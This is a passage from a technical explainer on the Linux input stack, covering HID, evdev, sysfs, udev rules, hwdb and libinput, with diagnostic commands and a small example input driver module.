but in reality those might get mixed up (bus&device because it’s both).
The IO layer is responsible for handling the physical electrical
communication with the device, it’s setup, and management. At this level
we have USB, Bluetooth, I2C, SPI, etc.. In drivers that means:
usbhid
for HID devices over USB,
btusb
and
hidp
for HID over Bluetooth,
i2c-hid
for touchpads and keyboards that are wired to the motherboard’s
I2C,
psmouse
and
serio
for PS2 mouse, etc..
The protocol or function specific layer then takes over and has as role
to integrate with the input core and translate the raw transport data
into a common format, usually evdev. The evdev format is favored
as it provides a uniform API to represent input devices (via
/dev/input/eventX
).
A few examples:
There’s a mouse communication protocol usin 9 pins DE-9 over the RS-232
standard for communication with UART
The PS/2 mouse which uses a serial transport protocol with 6 pins (
serio
)
The atkbd keyboard also over serial transport
A gamepad that uses HID but the particular case of a sony joystick over USB
There’s another component of complexity to add: we don’t have a
single protocol for a single transport over a single hardware bus/host
controller. Sometimes there’s a generic protocol layer which is reused
with different transport mechanisms. There can also be a delegation
mechanism for the more specific sub-protocol handlers for specific
devices or modes.
For example, you can have an HID protocol over USB (
usbhid
), and the
particular part of the HID protocol used for input devices, and the more
specific sub-HID protocol of a type of device (
hid-generic
and others).
We’ll see an example of this by diving into the HID subsystem which is
the most popular input protocol these days, but first let’s check some
tools that can help us see all that we’ve learned thus far and make
sense of the hierarchy:
lspci -vn
list info about devices connected via PCI buses
lsusb -v
or
usb-devices
list usb devices information in a more human readable form
dmesg
the sys logs
hwinfo --short
to probe hardware
Yet the best way to get a lot of info about the bus and device hierarchy
is to rely on
udevadm
, a user-space tool that comes with udev. Here’s
how it looks for an input device:
> udevadm info -a-p$(udevadm info -q path -n /dev/input/event9)
looking at device '/devices/.../input/input6/event9':
KERNEL=="event9"SUBSYSTEM=="input"
ATTR{name}=="Logitech USB Keyboard"
...
looking at parent device '/devices/.../input/input6':
KERNEL=="input6"SUBSYSTEM=="input"
...
looking at parent device '/devices/.../0003:046D:C31C.0003':
KERNELS=="0003:046D:C31C.0003"DRIVERS=="hid-generic"SUBSYSTEMS=="hid"
...
looking at parent device '/devices/.../1-1:1.0':
KERNELS=="1-1:1.0"SUBSYSTEMS=="usb"DRIVERS=="usbhid"
...
looking at parent device '/devices/.../1-1':
KERNELS=="1-1"SUBSYSTEMS=="usb"DRIVERS=="usb"
...
looking at parent device '/devices/.../0000:00:14.0':
KERNELS=="0000:00:14.0"SUBSYSTEMS=="pci"DRIVERS=="ohci-pci"
...
NB
: It is also a bit more clearer, though for the moment confusing,
to also look at
udevadm info --tree
. Similarly, the
loginctl
seat-status
also clearly shows the hierarchy of devices in the current
session. We’ll talk more about the concept of seats later on.
We see the “looking at parent device” block that corresponds to one
struct device
in the kernel kobject mapped in sysfs, along with the
driver, when it’s present, and other info it gathers at every step,
walking down the bus hierarchy. Let’s note that not everything has
an associated driver since the hardware topology might not match the
driver topology. That often means one kernel component handles multiple
parts of the stack. In the above trace,
hid-generic
handles the input
registering.
This example in particular shows:
PCI → USB controller → USB device → HID interface → input device → evdev node
Another source of information that we briefly mentioned is the procfs
introspection interface (
/proc/bus/input/
), it can also help see the
handling of input devices more clearly as it’s a text-based view of what
the kernel input subsystem knows. It is more or less analogous to the
sysfs view but is meant for human-readable diagnostics. In conjunction
with what we’ve learned in the previous input core section, it should
clarify some of our understanding. It has two files underneath:
devices
and
handlers
.
The
devices
file contain all the current input devices and has entries
with these fields:
I
: basic info (bus type, vendor/product/version)
N
: name
P
: physical path (e.g.,
isa0060/serio0/input0
)
S
: sysfs path
U
: unique identifier (if provided)
H
: list of event handler interfaces bound (like
event3
,
js0
, etc.)
B
: capability bitmaps (
EV
,
KEY
,
REL
,
ABS
, etc.) we’ll explore what
this means when looking at evdev
Here you can see that a single physical device can possibly present
itself as multiple input devices with different handlers attached for
separate functions (here the keys of the System Control handler are
fewer). Here,
kbd
is console handler, and
eventN
is the evdev
user-space handler. Libinput, which we’ll cover later, uses groups
LIBINPUT_DEVICE_GROUP
to logically combine the different devices that
are actually on the same hardware.
The handlers file is about instances of the
input_handler
that will
be called from input core’s
input_event
we mentioned before. As we
said most of it is handled by evdev, but there are exceptions such as:
We’ll talk about joydev later on. As for mousedev, it is there only for
legacy compatibility of old
/dev/psaux
-style mouse interface.
Let’s now see the example of a dummy input driver, to get the idea across.
// SPDX-License-Identifier: GPL-2.0#include<linux/module.h>
#include<linux/init.h>
#include<linux/input.h>
#include<linux/timer.h>staticstructinput_dev*dummy_input_dev;staticstructtimer_listdummy_timer;staticvoiddummy_timer_func(structtimer_list*t){staticboolkey_down=false;/* Simulate key press/release of KEY_A */key_down=!key_down;input_event(dummy_input_dev,EV_KEY,KEY_A,key_down);input_event(dummy_input_dev,EV_SYN,SYN_REPORT,0);/* Reschedule timer */mod_timer(&dummy_timer,jiffies+msecs_to_jiffies(2000));}staticint__initdummy_input_init(void){interr;dummy_input_dev=input_allocate_device();if(!dummy_input_dev)return-ENOMEM;dummy_input_dev->name="Dummy Input Device";dummy_input_dev->phys="dummy/input0";dummy_input_dev->id.bustype=BUS_VIRTUAL;dummy_input_dev->id.vendor=0x0001;dummy_input_dev->id.product=0x0001;dummy_input_dev->id.version=0x0100;/* Declare we can emit key events */__set_bit(EV_KEY,dummy_input_dev->evbit);__set_bit(KEY_A,dummy_input_dev->keybit);err=input_register_device(dummy_input_dev);if(err){input_free_device(dummy_input_dev);returnerr;}/* Setup a timer to inject key events periodically */timer_setup(&dummy_timer,dummy_timer_func,0);mod_timer(&dummy_timer,jiffies+msecs_to_jiffies(2000));pr_info("dummy_input: registered fake input device\n");return0;}staticvoid__exitdummy_input_exit(void){del_timer_sync(&dummy_timer);input_unregister_device(dummy_input_dev);pr_info("dummy_input: unregistered\n");}module_init(dummy_input_init);module_exit(dummy_input_exit);MODULE_AUTHOR("Example Author");MODULE_DESCRIPTION("Minimal Dummy Input Device");MODULE_LICENSE("GPL");
That’s it, you should now somewhat have an idea of how we pass from
hardware events, to kernel objects, and end up within the input core
subsystem, which should prepare events for user-space. Let’s now dig on
and explore a few of the topics we’ve grazed in the past two sections.
sysfs
We already covered a lot of ground in understanding sysfs, so let’s
continue and summarize everything we know and complete the full picture.
As we briefly said before, sysfs is a virtual file system representation in
user-space of the kernel objects and their attributes, it’s how the kernel
views the current state of the system, and also how the user can interface
with the parameters of the kernel in a centralized manner. It’s all done
in a very Unixy way by manipulating simple files.
The file mapping happens as such: kernel objects are directories, their
attributes are regular files, and the relationship between objects is
represented as sub-directories and symbolic links.
The object information is categorized as one of the following. Each of
these is a sub-directory under
/sys/
.
block - all block devices available in the system (disks, partitions)
bus - types of bus to which physical devices are connected (pci, ide, usb)
class - drivers classes that are available in the system (net, sound, usb)
devices - the hierarchical structure of devices connected to the system
dev - Major and minor device identifier. It can be used to automatically
create entries in the
/dev
directory. It’s another categorization of
the devices directory
firmware - information from system firmware (ACPI)
fs - information about mounted file systems
kernel - kernel status information (logged-in users, hotplug)
module - the list of modules currently loaded
power - information related to the power management subsystem
information is found in standard files that contain an attribute
device (optionally) - a symbolic link to the directory containing devices; It can be used to discover the hardware devices that provide a particular service (for example, the ethi PCI card)
driver (optionally) - a symbolic link to the driver directory (located in
/sys/bus/*/drivers
)
As far as we’re concerned, when it comes to input devices, the
/sys/devices/
directory is probably one of the most important. It’s
the representation of the hierarchy of devices we’ve talked about in
the previous section.
Pasting the tree here would be cumbersome, but try
tree -L 5 | less
within
/sys/devices
and you’ll clearly see how things fit together,
a direct hierarchical mapping of how devices are connected to each others.
Within this directory we can find interesting information associated to
the device and its type. For usb devices, for example, we have info such
as the bus number, port number, the vendor and product id, manufacturer,
speed, and others.
Furthermore, the
/sys/bus
directory organizes devices by the type of
bus they are connected to. You can imagine that this isn’t a linear
view since buses can have buses as devices (
usb
and
hid
each have
their directory even though
hid
is probably under
usb
), but it it
helpful to perceive what is happening, an easy shortcut. Within each
bus directory there are two subdirectories: drivers, that contains the
driver registered for the bus, and devices, that contains symbolic links
to the devices connected to that bus in
/sys/devices
.
Similarly, the
/sys/class
directory has another view of the system
from a more functional/type perspective. It’s about what devices do and
not how they’re connected. As far as we’re concerned, the subdirectory
/sys/class/input/
is where we’ll find symbolic links to all devices
that have the input class in
/sys/devices
.
This directory contains both symlinks to input devices and evdev devices,
the latter are usually sub-directories of the former. A notable file in
the input directory is the “capabilities” file, which lists everything
that the device is capable, as far as input is concerned. We’ll revisit
this in the evdev section.
Finally, the last directory that is of interest to us in sysfs is
/sys/module/
which provides information and settings for all loaded
kernel modules (the ones that show with
lsmod
), their dependencies
and parameters.
Lastly, and it might not need to be mentioned, but sysfs needs to be
enabled in the kernel confs. It always is these days since it’s expected
by many software.
HID — Human Interface Device
HID, or Human Interface Device, has been mentioned and sprinkled all
over the place in the last sections, we said it’s a device protocol but
what is it exactly?
HID is probably the most important input/output standard device protocol
these days, it’s literally everywhere and most new devices, from mice
to microphones, speak it over all types of transports such as USB, i2c,
Bluetooth, BLE, etc… It’s popular because it’s a universal way to let the
device first describe its capabilities (buttons, keys, axis, etc..),
what it can send/receive (Report Descriptor), and then send/receive them in
the expected way (Input/Output/Feature Reports).
In sum, in the ideal case it would mean avoiding having a specific driver
for every new device out there and instead have a centralized generic way
to handle all categories of devices, all working out-of-the-box. Indeed, in
practice it has worked great and there have only been minor vendor or
hardware quirks fixes (
drivers/hid/hid-quirks.c
and others).
For example, a HID Report Descriptor may specify that “in a report
with ID 3 the bits from 8 to 15 is the delta x coordinate of a mouse”.
The HID report itself then merely carries the actual data values without
any extra meta information.
The current list of HID devices can be found under the HID
bus in syfs,
/sys/bus/hid/devices/
. For each device, say
/sys/bus/hid/devices/0003:1B3F:2008.003E/
, one can read the
corresponding report descriptor:
The raw HID reports can also be read from the
hidraw
file created by
hid core in devtmpfs
/dev/hidrawN
.
What does an input device HID Report and Report Descriptor look like?
We won’t go into too much details since the HID specifications are huge
but we’ll only do a tour to get an idea and be productive with what
we know. If you want to dive deeper, check the specifications
here
, it’s divided into a basic structure doc
“HID USB Device Class Definition”, and the HUT, “HID Usage Tables”, which
defines constants to be used by applications.
So as we said, the main logic of the protocol is that HID messages are
called Reports and that to parse them we need a Report Descriptor. The
Report Descriptor is a kind of hashmap stream, it contains Items, which
are 1B header followed by an optional payload of up-to 4B. The Items
don’t make sense by themselves, but do make sense together as a whole
when read as a full stream since each Item has a different meaning. Some
meaning apply locally and others globally.
The encapsulating and/or categorizing Items are the Usage Page, which
is a generic category of thing we’re describing, with its subset of
Usage, which is the specific thing we control within that Page. These
are defined in the “HID Usage Tables” doc. It’s things such as:
It’s a couple of info to know how to better handle the HID internal data,
it tells you what is actually being handled.
Another grouping mechanism is the Collection, a broader category
to put together all that the device handles. Let’s say a mouse can
have both buttons, a scroll wheel, and axis it moves on, all within
a Collection. There are 3 types of collections that encapsulate each
others: Application (mandatory) the device-level group, Logical (optional)
sub-grouping for related controls, and Physical (optional) sub-grouping
for physical sensors.
Reports within Collections can also be grouped by IDs to facilitate
parsing.
Within all these, within the inner Collections, we finally have the
definition of what the Reports will actually look like. Here’s a subset
of what a Report Descriptor can look like:
This is all a single report with ID
0x01
, and we see first that within
the Button page we have values ranging from 1 to 5, a count of fields
in the current report size of 5, for 5 buttons each having one bit. The
Input
Item tells us to start processing the Report as input data (there’s
also
Output
and
Feature
). It also indicates that buttons have absolute
values, unlike the X/Y axis which are relative.
The
Cnst
of the following data in the stream stands for constant,
and it’s basically ignored, it’s padding.
And so on, we parse the data afterward, the X/Y relative movements.
One thing to note, is the scope of the meaning of the Items. Some apply
globally, such as the Usage Page, Logical Min/Max, Report Size, Report
Count, etc.. Meanwhile, Usage only apply locally and needs to be set
again. Other Items have special meaning such as Input, Output, Feature,
Collection and End Collection, and are about defining the structure of
data and when to process it.
Here’s a full real example with the Collection grouping mechanism:
As you can see, lots of it may seem redundant within the Logical and
Physical optional sub-collections but they’re often there by default
for hierarchical grouping. They’re not mandatory but common.
Let’s also note that from hid-input’s perspective, one device is created
per top-level Application Collection, so in theory a device can have
many sub-devices.
From the kernel’s perspective, the transport bus notices that a device
is advertised as an HID class and then the data gets routed to the hid
core bus.
For example, this is what the USB transport might notice:
The HID core subsystem is in charge of managing the lifecycle
(connect/disconnect/open/close), parsing the HID report descriptors
to understand the device capabilities. Once parsed, it dispatches
Reports to the HID drivers registered on the HID bus, each driver can
inspect the Usage Page and Usage to decide how and whether to handle
them. This is like a publish-subscribe mechanism. The most specific
registered driver (vendor specific) will match and handle Reports in
whatever way they see fit, otherwise the hid-generic driver is the
fallback.
Several
*_connect
hooks in the HID core subsystem allow attaching
handlers for different behavior that HID device provide. The most
important for us is the
hidinput_connect
for the
HID_CONNECT_HIDINPUT
,
to handle HID input devices. It’s default implementation lives in
hid-input
(internally
hidinput_report_event
). Device specific drivers
can override this behavior if needed. The hid-input role is to bridge
with the input core, allocating and registering the input device via
input_register_device
, which will in turn expose
/dev/input/eventN
,
as we’ve seen before, and translate HID Reports to evdev.
Similarly, in this pub-sub fan-out fashion, another handler is the
default one registered for
HID_CONNECT_HIDRAW
, from
hidraw.c
(
hidraw_report_event
). This driver will create a raw interface on
devtmpfs (
/dev/hidrawN
) to interface with raw HID events that aren’t
necessarily input-related.
This looks somewhat like this:
This is all neat, let’s list a couple of tools that can help us debug
HID and inspect HID Reports Descriptors and Reports.
usbhid-dump
- will dump USB HID device report descriptors and streams
hidrdd
- verbose description of hid report descriptors
hid-tools
- has many sub-tools such as replay, decode, and recording
The simplest one in my opinion is hid-tools, here’s an example of a
keyboard with consumer control and system control, the same one we’ve
seen in the procfs introspection interface earlier (
/proc/bus/input/
):
You can see it has two Application Collections, so that’s why we had
two entries for the keyboard.
In some cases, the HID Device Descriptor is wrong
and needs some patching, which can either be done in a
special driver, or on a live system dynamically by relying on
udev-hid-bpf
which will be invoked before the kernel handles HID.
evdev — Event Device
Let’s tackle the last piece of the exposed middle-layer that we didn’t
explain yet: The Event Device common protocol, the evdev layer.
From what we’ve seen, we know that evdev is a standardization interface,
it decouples and abstracts the underlying devices. It could be a USB
keyboard, a Bluetooth pointer, or PS/2 device, and all the user needs
is to read from the evdev interface, without worrying about their
differences.
It works because evdev registers itself as the default input handler in
the input core, and the main job of most input driver is to translate
to it:
When its “connect” event is fired, it creates the corresponding evdev
node in
/dev/input/eventN
. Furthermore, the info is also reflected
in sysfs within the
/sys/class/input/eventN
directory along with its
related
/sys/class/input/inputN
device created by the input core, which
it is the children of (
eventN
within
inputN
).
The evdev driver also supports certain ioctl to query
its internal state, let a client handle exclusively grab a
device (
EVIOCGRAB
), or change certain values. The list of ioctl can be found
here
within libevdev, though libevdev doesn’t support all of them (the list
can also be found in
include/linux/input.h
).
Let’s see what the evdev format is about, and how the input core
translates to it and generates the events.
The evdev protocol is stateful, it doesn’t forward everything to
user-space but only does when it notices a change. To inquire about
its current state one can rely on ioctl instead.
The format of evdev is composed of a series of
input_event
(from
include/linux/input.h
) which look like the structure here under,
grouped in what’s called a sequence or a frame:
Basically a timestamp along with a type-code couple and an associated
value. The type is the general category to which this event is part of,
and the code the sub-category. For example it could be a relative movement
(type), on the x-axis (code), of 1 unit (value). The available types of
events and codes can be found under
include/linux/input-event-codes.h
.
Each frame ends whenever a synchronization event comes up, the most
common is of type.code(value)
EV_SYN.SYN_REPORT(0)
. It’s the marker
that it’s time to make sense of the stream, the whole frame.
An example snapshot of a frame of an “absolute touchpad” would look
like this:
As we’ve said, it’s stateful, so the events are only sent when there is a
state change, even when the hardware keeps resending the same event. So
for example, if a key is kept pressed, it won’t resend the event until
it’s released.
These events might seem simple on their own but are in fact absolutely
complex to handle, especially touchpads. There are many features such as
pressure, multi-touch, and the tracking of different fingers, which needs an
upper layer to make sense of all this. This is where libinput shines, and
we’ll see that later on. For now just keep in mind it’s a series of event.
So how do drivers use evdev to send events, we’ve talked about
input_event
before, but how does it work.
Well, first of before sending any event, the input driver needs at the
registration phase to advertise to the system what it’s capable of,
to say what kind of events it can generate. These event “capabilities”,
as they’re called, are a couple of different bits in sets that are also
inspectable in sysfs
/sys/class/input/inputN/capabilities/
.
You’ll find the following types of capabilities:
ev
, set in
input_dev->evbit
, Which event types the device can generate (
EV_KEY
,
EV_REL
, etc.)
key
, set in
input_dev->keybit
, Which key/button codes it supports
rel
, set in
input_dev->relbit
, Which relative axes (e.g., REL_X, REL_WHEEL)
abs
, set in
input_dev->absbit
, Which absolute axes (e.g., ABS_X, ABS_Y)
led
, set in
input_dev->ledbit
, LED indicators (e.g., keyboard LEDs)
sw
, set in
input_dev->swbit
, Switch states (e.g., lid switch)
ff
, set in
input_dev->ffbit
, Force feedback capabilities
msc
, set in
input_dev->mscbit
, Miscellaneous events
snd
, set in
input_dev->sndbit
, Sound events
As you can see, it’s somewhat related the HID capabilities in a sense,
but applies to all devices.
We’ve also seen these capabilities bits during our inspection of the
input core procfs interface
/proc/bus/input/
in the
B
field:
However, parsing the bits manually in procfs or sysfs would be cumbersome,
it’s better to rely on tools such as
libinput record
, check the
“Supported Events”
section:
As a note, the Properties can let us know whether we’re dealing with
a touchscreen
INPUT_PROP_DIRECT
, or a touchpad
INPUT_PROP_POINTER
,
and
INPUT_PROP_BUTTONPAD
also tells us that it’s a so-called clickpad
(no separate physical buttons but the whole touchpad clicks). These are
hints for libinput to properly handle different kinds of devices.
So after registering its capabilities, the input driver simply reports
its events by relying on the
input_event
function, or one of it’s
many wrappers:
That’s it mostly to understand evdev! There are multiple tools to help
debug evdev-related issues. We’ve seen
libinput record
. Similarly,
there’s the
evemu
suite with its record, device, play functions to
simulate and test devices, and
evtest
.
There’s also
evsieve
, a tool to
intercept and modify evdev events on the fly.
Along with these, the library libevdev, in C and python, is the most
used to integrate with evdev-related things.
udev & hwdb
After going through the kernel and exposed layers, we’re finally in
user-space!
The first component we’ll see is udev, since we mentioned its role
countless times in the previous sections.
Udev, or the dynamic user-space device manager, implemented as the
udev daemon
systemd-udevd
, has as role to take actions whenever a
uevent (
PF_NETLINK, NETLINK_KOBJECT_UEVENT
) is sent from the kernel
to user-space. We’ve seen a few of the possible actions it performs,
here’s a summary of the kind of things it does:
Load kernel modules based on the uevent MODALIAS
Set access rights on device nodes
Attach properties to devices on detection
Create symlinks so that devices have more predictable names
Keep track internally of device info in its internal db
Use its rule system to take any kind of action on plug/unplug of a device
The most important part is the last point: udev has a set of rules against
which it can match devices and their attributes and take all sorts of
actions based on that. The fields it has access to not only come from the
uevents but also from all related info on the system.
These rules, as is the convention for pretty much all big daemons these
days, are read from system locations such as
/usr/lib/udev/rules.d
,
/usr/local/lib/udev/rules.d
, and the volatile runtime in
/run/udev/rules.d
, and from the local admin directory of
/etc/udev/rules.d
which takes precedence over the other locations. The
directories contains files with a
.rules
extension and are processed and
ordered lexically (
01-example.rules
comes before
05-example.rules
).
Now the syntax of udev rules, which are mainly composed of matching
patterns and actions to perform or properties to set upon match, is
dense and complex (it even has branching). Only a deep study of
udev(7)
man page will help. Yet, we can still learn the very basics of it to be
able to understand what’s happening.
Our approach will consist of, first checking two examples, then have a
general overview of the possible components of the syntax, and finally
talking about the particularities of that system.
The first example is quite simple, it will run a script when a specific
keyboard is plugged/unplugged.
The rule is pretty clear about what it does, on “add” or “remove” action
for specific match it’ll execute a script. But you’ll also notice that the
match components such as SUBSYSTEM and ATTRS are things we’ve seen before
in previous traces of
udevadm info
, which is exactly the point.
udevadm
info
will show us certain components we can used to match.
The second example is a tad bit more complex, we will parse
/usr/lib/udev/rules.d/60-persistent-input.rules
. That file creates
a more persistent naming scheme for input devices in devtmpfs under
/dev/input/by-id
and
/dev/input/by-path/
. Here’s a simplified version
of it.
ACTION=="remove", GOTO="persistent_input_end"
SUBSYSTEM!="input", GOTO="persistent_input_end"# …# determine class name for persistent symlinks
ENV{ID_INPUT_KEYBOARD}=="?*", ENV{.INPUT_CLASS}="kbd"
ENV{ID_INPUT_MOUSE}=="?*", ENV{.INPUT_CLASS}="mouse"# …# by-id linksKERNEL=="event*", ENV{ID_BUS}=="?*", ENV{.INPUT_CLASS}=="?*",
ATTRS{bInterfaceNumber}=="|00",
SYMLINK+="input/by-id/$env{ID_BUS}-$env{ID_SERIAL}-event-$env{.INPUT_CLASS}"# by-path
ENV{.INPUT_CLASS}=="?*", KERNEL=="event*",
ENV{ID_PATH}=="?*",
SYMLINK+="input/by-path/$env{ID_PATH}-event-$env{.INPUT_CLASS}"# …LABEL="persistent_input_end"
We can see multiple things from this short example. First of all,
the branching mechanism with its use of
GOTO
whenever certain matches
don’t fit the specific use-case. We can also see the standard comparison
operators such as
==
and
!=
.
Then we see different variables/values that are either compared against
such as
SUBSYSTEM
,
ACTION
,
KERNEL
,
ATTRS{…}
,
ENV{}
, or
assigned such as
ENV{…}
,
GOTO
, or
SYMLINK
. The assignment seems
to either use
=
or
+=
.
Furthermore, from this example we can also see some regex-like pattern
matching, and string substitution within assignment.
Yet, overall the idea makes sense. We create some string variable based
on what type of input device we’re dealing with (prepended with
.
means it’s only temporary), which we found in
ENV{…}
, the device
properties. Then for event devices we create two symlink files in
different directories “by-id” and “by-path”. For the by-id it’s composed
of the bus name, followed by the device name, “-event-“, and the input
class we’ve stored in the temporary variable.
The lines starting with
E:
are device properties that are in
ENV{…}
,
the meaning can be found in
udevadm(8)
manpage, which we’ll see more
of in other examples.
So from this, the device should be symlinked as
/dev/input/by-id/usb-SEMICO_USB_Keyboard-event-kbd
, which it indeed is.
That’s a neat example, it gives us a generic idea of udev. Let’s continue
and try to get a more general idea of the udev syntax.
So far we’ve seen that the rules files contain key-value pairs, or
comments starting with
#
as is standard in most conf files, and
has operators that are either for comparison,
==
and
!=
, or for
assignment, we’ve seen
=
and
+=
.
The difference between these two assignment operators is that some
variables/keys are lists, and the
+=
appends to that list, while the
=
operator would basically empty the list and set only the single
value in it. Additionally, there are two other assignment operators
we haven’t seen: the
-=
to remove a value from a list, and the
:=
which sets a constant and disallow future change.
How to know if something is a list or a scalar value, and if the key can
be used in comparison or assignment. Well, it depends on the key itself,
which are listed in the man page
udev(7)
, we’ll see the most common
but first let’s talk about the values.
The values assigned are always strings within double quotes, and use
the usual same escape mechanism that C and other languages use. It also
allows case-insensitive comparison by having the string preceded by “i”,
such as
i"casedoesn't matter"
.
The strings also allow internal substitution with variables/keys, some
that can be set on the fly, from the match, or from a set of global
ones. It’s similar to a lot of languages:
"hello $kernel $env{ID_PATH}"
.
This is what we’ve seen in one of our examples.
Furthermore, if a string is used during matching, it can include
glob patterns, also the usual ones, such as
*
to match zero or more
characters,
?
to match a single characters,
|
for the or separator,
and
[]
to match a set of characters. Obviously, these special characters
will need to be escaped if used as-is.
Now, as we said there are keys used to do matching/searching, and keys
that allow assigning values (list or not), yet what’s confusing is that
lots of keys can be used for both, but not all of them. A quick look at
udev(7)
to be sure doesn’t hurt.
Here are some common matching keys:
KERNEL
: kernel name
SUBSYSTEM
: the kernel subsystem the device is associated to
DRIVER
: the driver currently handling the device
ACTION
: Represents what’s happening on a device. Either
add/remove
when the device is created or removed,
bind/unbind
for the driver,
change
when something happens on a device such as a state change (ex:
eject, power plug, brightness),
offline/online
for memory and cpu,
move
when a device is renamed.
ATTR{attributename}
: match any sysfs attribute of the device
TAG
: arbitrary tags, mostly used for user-space special behavior
ENV{property_name}
: Context info, device properties, added by the
kernel or other udev rules associated to device. They are not
environment variables, but do get passed as
env
to
RUN+=
commands.
PROGRAM
and
RESULT
: The first executes an external program and
if it’s successful then the match is ok, the second checks the string
result of the last program and uses it as a comparator.
Still, there are variants of some of the above to allow a match with any
of the parents of the devices in the topological hierarchy, these include
KERNELS
,
SUBSYSTEMS
,
DRIVERS
, and
ATTRS
.
Now, we’ve dealt with the keys used for comparison, let’s see the common
assignment keys:
SYMLINK
: A list of symlinks to be created
ATTR{attributename}
: Value that should be set in sysfs
TAG
: A list of special attributes for user-space to act
upon. For example, systemd acts on
TAG+="systemd"
and will read
ENV{SYSTEMD_WANTS}
and interpret it as a unit dependency for the
device. It can be used to automatically start services.
ENV{property_name}
: Context info, device properties, of the device. If
the property name is prepended with a dot
.
, then it will only
temporarily be set.
OWNER
,
GROUP
,
MODE
: Set permissions on the device
RUN{type}
: A list of external programs to run. The type is optional
and defaults to “program”, but it can be “builtin”, which are
plugins. Beware that
RUN
will timeout, and so it’s always better to
dispatch long running process to starter scripts instead that will exit
directly.
systemd-run --user
is often used here to execute things
in a normal graphical session such as notifications.
IMPORT{type}
: Similar to
RUN
but used to import a set of variables (
ENV
)
depending on the type, can be “program”, “builtin”, “file”, “db”,
“parent”, “cmdline”.
LABEL
,
GOTO
: A label and goto to jump to it, creating branching.
The
RUN{builtin}
is a bit of an edge-case within udev since there are
many builtin modules and most of them are blackboxes that are hardly
documented. We know from
udevadm test-builtin --help
that these exist:
blkid Filesystem and partition probing
btrfs btrfs volume management
dissect_image Dissect Disk Images
factory_reset Factory Reset Mode
hwdb Hardware database
input_id Input device properties
keyboard Keyboard scancode mapping and touchpad/pointingstick characteristics
kmod Kernel module loader
net_driver Set driver for network device
net_id Network device properties
net_setup_link Configure network link
path_id Compose persistent device path
uaccess Manage device node user ACL
usb_id USB device properties
Unfortunately, what they do isn’t clear unless you step in the code of
udev-builtin
.
For example,
input_id
will set a series of
ENV
info on the device depending on what it thinks
it is. Here’s some relevant code snippet:
And, that’s the tip of the iceberg to understand udev rules. Yet, the ones on
a real system are a monstrously big patchup. The only way to visualize
all of them on your system, in the way they’ll be processed, is with
systemd-analyze cat-config udev/rules.d
.
Before getting on with actual examples and tools, let’s take some time
to talk about one of the most important builtin module to udev:
hwdb
,
the harware db, or
systemd-hwdb
. Which is an extra mechanism to write
rules for udev to add device properties (
ENV{}
).
The hardware db is a lookup table that lives in files with the
.hwdb
extension under the udev directory in the
hwdb.d
directory. These
key-values at
systemd-hwdb
start are compiled in a
hwdb.bin
file for
quick retrieval. They consist of matches of modalias-like keys and then
a series of assignment for properties. Something like:
The format is a simple series of match strings, one or multiple, and then
assignment values following it on lines that start with a space. Match
strings can use glob for the match, they’re not really following any
specific format other than
prefix:search criteria
. Yet, the question is:
how are these modalias-like strings used. And the answer is obviously:
it’s used by udev via its
IMPORT
of the builtin hwdb to set certain
device properties based on the lookup. For example:
So udev passes a set of parameters to hwdb, along with the device, and it
will return
ENV
properties to set. hwdb also has an accompanying command
line tool that works in a similar way and allows querying it. However, it
has no man page, as far as I can see, but the following args are allowed:
--filter or -f:
--device or -d:
--subsystem or -s:
--lookup-prefix-p:
So for example when passing
--subsystem=usb
and a device, hwdb will get
the actual
MODALIAS
of the device, or construct one from the
idVendor
,
idProduct
, and
product
, then try to match it in its lookup table.
Anyhow, we won’t spend time breaking down the source code. Let’s just
add that since the
hwdb
lookup table is compiled at the start, then
when entries are added or modified
systemd-hwdb
needs to be updated
or notified via:
systemd-hwdb update # compile the hwdb
Similarly, the same is also true of udev. However, udev has more granular
reload mechanism, either to reload rules or to re-emit events so that
they can be processed by the new rules:
udevadm trigger # re-emits all the uevents
udevadm trigger /sys/class/input/eventXYZ # only re-emit this device events
udevadm control --reload# reload all rules but will only apply to new events
Let’s see more examples of
udevadm
, which is the main way to interface
with udev.
udevadm info
is used to gather information about devices, we’ve seen
it earlier in previous sections. It’s handy to write udev rules. You can
pass it either a devtmpfs path, a sysfs path, a device ID, or a systemd
unit name of
.device
type (these are the
TAG+="systemd"
devices to
automatically load other units).
For example, we can walk and find the attribute hierarchy of a certain
device.
Another option is to rely on
udevadm monitor
, which is a live trace
of all the uevent being sent.
Yet another option is
udevadm test
to print the rules that will get
triggered on a certain device uevent. This is useful to check whether
the rules make sense and will get executed.
A last tip to remember when writing udev rules is that
ATTR{}
is
anything in the files of sysfs. So we can simply match like this:
> cat /sys/class/input/event5/device/name
SEMICO USB Keyboard
And the rule would be
ATTR{name}=="SEMICO USB Keyboard"
.
Finally, let’s have a honorable mention to the mdev and eudev projects,
which are udev-like projects but more compatible with other init systems.
libinput
Libinput is a wrapper over udev and evdev. It provides a centralized way
to perform device detection, device event handling, input processing,
along with abstractions and common set of facilities to make the
practical, and user-expected, input handling easier. Today, libinput is
the major input library used by all graphical environments and toolkits,
it’s used by Xorg (through a driver) and Wayland compositors, so we’re
all probably using it indirectly.
Its basic mechanism works as you’d expect.
As far as udev is concerned, it relies on
libudev/sd-device
to
enumerate devices and listen to kernel’s uevent. In particular, it
analyzes properties added by udev that helps categorize devices and
override settings (
ID_INPUT
,
ID_INPUT_*
,
LIBINPUT_*
), and filters
which devices it is allowed to handle by looking at which “seat” they’re
associated with. The whole udev part can be skipped by manually passing
events with
libinput_path_add_device
, but that’s a fallback scenario.
And when it comes to evdev, it gets the handle to the corresponding
input stream devices then continuously read events and processes
them. This processing includes a lot of things such as scaling
touch coordinate, calculating pointer acceleration, debouncing
keys, etc.. Then finally, libinput returns these events in a unified
API as
LIBINPUT_EVENT_POINTER_BUTTON
,
LIBINPUT_EVENT_POINTER_MOTION
,
and
LIBINPUT_EVENT_POINTER_MOTION_ABSOLUTE
.
That also means it handles only the usual input devices such as mice,
keyboards, touchpads/clickpads, switches, trackpoints/pointing sticks,
touchscreens, and graphic tablets. It doesn’t handle joysticks, for
example, since these aren’t used for desktop environment but for games.
Scrolling, Three-finger drag, and Tap-to-click behaviour
Gestures
We’ll see what these means, but first, why is libinput needed, can’t
udev and evdev be handled directly? Why have another layer of indirection?
The answer is twofold: to avoid having additional separate modules in the
upper stack such as in the X server, and because handling input devices
is messy and not as simple as taking evdev events as-is, they need a
bit more interpretation and cleanup.
Previously, before Wayland got traction, the X11 stack had specific
custom drivers, the xf86 input driver API, for each type of hardware and
use-case. Yet, these xf86 drivers could also have common functionalities
such as two-finger scrolling, which adds confusion. This was mostly a
hack for days before evdev existed, and there was a need for a library
independent of X11 that would centralize this responsibility, instead
of having it dispersed in different places. This makes it easier to
